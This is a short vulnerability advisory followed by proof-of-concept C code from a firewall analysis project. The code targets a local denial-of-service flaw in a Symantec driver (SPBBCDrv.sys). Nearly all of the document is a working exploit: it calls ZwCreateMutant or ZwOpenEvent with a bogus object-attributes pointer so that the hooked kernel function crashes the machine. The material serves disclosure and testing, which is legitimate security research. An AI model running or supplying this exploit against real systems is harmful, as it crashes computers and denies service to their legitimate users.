// source: https://www.securityfocus.com/bid/23241/info Multiple Symantec products are prone to a local denial-of-service vulnerability. This issue occurs when attackers supply invalid argument values to the 'SPBBCDrv.sys' driver. A local attacker may exploit this issue to crash affected computers, denying service to legitimate users. /* Testing program for Multiple insufficient argument validation of hooked SSDT function (BTP00000P002NF) Usage: prog FUNCNAME FUNCNAME - name of function to be checked Description: This program calls given function with parameters that cause the crash of the system. This happens because of insufficient check of function arguments in the driver of the firewall. Test: Running the testing program with the name of function from the list of functions with insufficient check of arguments. */ #undef __STRICT_ANSI__ #include #include #include #include #include void about(void) { printf("Testing program for Multiple insufficient argument validation of hooked SSDT function (BTP00000P002NF)\n"); printf("Windows Personal Firewall analysis project\n"); printf("Copyright 2007 by Matousec - Transparent security\n"); printf("http://www.matousec.com/""\n\n"); return; } void usage(void) { printf("Usage: test FUNCNAME\n" " FUNCNAME - name of function to be checked\n"); return; } int main(int argc,char **argv) { about(); if (argc!=2) { usage(); return 1; } if (!stricmp(argv[1],"NtCreateMutant") || !stricmp(argv[1],"ZwCreateMutant")) { HANDLE handle; OBJECT_ATTRIBUTES oa; InitializeObjectAttributes(&oa,(PVOID)1,0,NULL,NULL); ZwCreateMutant(&handle,0,&oa,FALSE); } else if (!stricmp(argv[1],"NtOpenEvent") || !stricmp(argv[1],"ZwOpenEvent")) { HANDLE handle; OBJECT_ATTRIBUTES oa; InitializeObjectAttributes(&oa,(PVOID)1,0,NULL,NULL); ZwOpenEvent(&handle,0,&oa); } else printf("\nI do not know how to exploit the vulnerability using this function.\n"); printf("\nTEST FAILED!\n"); return 1; }